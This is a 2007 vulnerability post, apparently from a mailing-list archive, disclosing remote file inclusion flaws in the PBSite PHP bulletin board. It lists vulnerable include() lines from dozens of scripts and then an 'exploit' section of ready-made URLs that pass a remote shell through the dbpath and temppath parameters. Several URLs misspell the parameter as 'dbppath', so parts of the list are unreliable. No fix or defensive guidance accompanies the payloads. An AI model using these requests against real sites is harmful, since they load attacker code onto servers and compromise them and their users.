Security Advisory: PBSite - PHP Bulletin Site | CMS ====> RFI

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Full Path Disclosure in SendCard
  Prototype of an PHP application ===> RFI
  static XSS / SQL-Injection in Omegasoft Insel
  phpreactor <===1.2.7 remote file include

From: pito pito <the-modest-pirate_(at)_hotmail.com>
Date: 01.06.2007
Subject: PBSite - PHP Bulletin Site | CMS ====> RFI

%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%
script:PBSite - PHP Bulletin Site | CMS ====> RFI

url:http://sourceforge.net/project/showfiles.php?group_id=88114

authot:titanichacker (the-modest-pirate@hotmail.com)

contact: hack-teach.com & mohandko.com & tryag.com
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%
bug in:   %%%
%%%%%%%%%%%
./useronline.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_".$language.".
php");
%%%
./ucp.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%
./setcookie.php
include($temppath."/pb/language/lang_".$language.".
php");
include($dbpath.'/settings.php');
%%%%%%%%%%
./sendpm.php
include($dbpath."/settings.php");
%%%%%%%%%%%
./search.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".
php");
%%%%%%%%%%
./register.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".
php");
%%%%%%%%%%%%
./profile.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%
./post.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".
php");
include($temppath."/pb/language/lang_".$language.".
php");
%%%%%%%%%%%%
./pmpshow.php

include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%
./pm.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%
./ntopic.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%
./nreply.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".
php");
include($temppath."/pb/language/lang_".$language.".
php");
%%%%%%%%%%
./news.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include ($dbpath."/posts/".$cat."_".$fid."_".
$pid);
include($temppath."/pb/language/lang_".$language.".
php");
%%%%%%%%%%%%%
./memberslist.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%

./logout.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include ($dbpath."/posts/".$cat."_".$fid."_".
$pid);
include($temppath."/pb/language/lang_".$language.".
php");
%%%%%%%%%%%%%%%%

./login.php
include($dbpath."/settings.php");
include_once("$temppath/$template/language/lang_$language.
php");
include_once("$temppath/$template/language/lang_$language.
php");
%%%%%%%%%%%%%%%%%
%%%%%%%%
./index.php
include($dbpath."/settings.php");
include_once("$temppath/$template/language/lang_$language.
php");
include_once("$temppath/$template/language/lang_$language.
php");
%%%%%%%%%%%%%%%%%

./help.php
include($dbpath."/settings.php");
include_once($dbpath."/settings/styles/styles.php");
include("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%
./forum.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_$language.php");
include($temppath."/pb/language/lang_".$language.".
php");
%%%%%%%%%%%%
./error.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_$language.php");
include($temppath."/pb/language/lang_".$language.".
php");
%%%%%%%%%%%
./editpost.php
include($dbpath."/settings.php");
%%%%%%%%%%%%
./delpost.php
include($dbpath."/settings.php");
%%%%%%%%%%
./delpm.php
include($dbpath."/settings.php");
include("$temppath/pb/language/lang_$language.php");
%%%%%%%%%%%%
./confirm.php

include($dbpath."/settings.php");

include($temppath."/pb/language/lang_".$language.".
php");
%%%%%%%%%%%%%
./board.php
include($dbpath."/settings.php");

include($temppath."/pb/language/lang_".$language.".
php");
%%%%%%%%%%%%%%%%

./admin2.php
include($dbpath."/settings.php");
%%%%%%%%%%%%%%%%%
%
./admin.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%

./templates/pb/css/formstyles.php
include ($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%
exploit:%%
%%%%%%%%%
http://victim/path/useronline.php?dbpath=[shell]
http://victim/path/useronline.php?temppath=[shell]
%%%%%
http://victim/path/ucp.php?dbpath=[shell]
%%%%%
http://victim/path/setcookie.php?temppath=[shell]
http://victim/path/setcookie.php?dbppath=[shell]
%%%%%
http://victim/path/sendpm.php?dbppath=[shell]
%%%%%%%
http://victim/path/search.php?dbppath=[shell]
http://victim/path/search.php?temppath=[shell]
%%%%%%%%%
http://victim/path/register.php?dbppath=[shell]
http://victim/path/register.php?temppath=[shell]
%%%%%%%%%%
http://victim/path/profile.php?dbpath=[shell]
%%%%%%%%
http://victim/path/post.php?dbppath=[shell]
http://victim/path/post.php?temppath=[shell]
%%%%%%%%%
http://victim/path/pmpshow.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/pm.php?dbppath=[shell]
%%%%%%%%%%%%
http://victim/path/ntopic.php?dbppath=[shell]
%%%%%%%%
http://victim/path/nreply.php?dbppath=[shell]
http://victim/path/nreply.php?temppath=[shell]
%%%%%%%%%%%%
http://victim/path/news.php?dbppath=[shell]
http://victim/path/news.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/memberslist.php?dbppath=[shell]
%%%%%%%%%%%%%%
http://victim/path/logout.php?dbppath=[shell]
http://victim/path/logout.php?temppath=[shell]
%%%%%%%%%%%%%%%%%
%
http://victim/path/login.php?dbppath=[shell]
http://victim/path/login.php?temppath=[shell]
%%%%%%%%%%%%%%%%%

http://victim/path/index.php?dbppath=[shell]
http://victim/path/index.php?temppath=[shell]
%%%%%%%%%%%%%
http://victim/path/help.php?dbppath=[shell]
http://victim/path/help.php?temppath=[shell]
%%%%%%%%%%
http://victim/path/forum.php?dbppath=[shell]
http://victim/path/forum.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/error.php?dbppath=[shell]
http://victim/path/error.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/editpost.php?dbppath=[shell]
%%%%%%%%%%
http://victim/path/delpost.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/delpm.php?dbppath=[shell]
http://victim/path/delpm.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/confirm.php?dbppath=[shell]
http://victim/path/confirm.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/board.php?dbppath=[shell]
http://victim/path/board.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/admin2.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/admin.php?dbppath=[shell]
%%%%%%%%%%%%
http://victim/path/templates/pb/css/formstyles.php?dbpath=[shell]
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%
%%%
thanx
%%%%%%%%%
        cold-zero & mohandko & tryag & arb-hawk & drbaka & kof2002 &
milw0rm & xp10
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

test server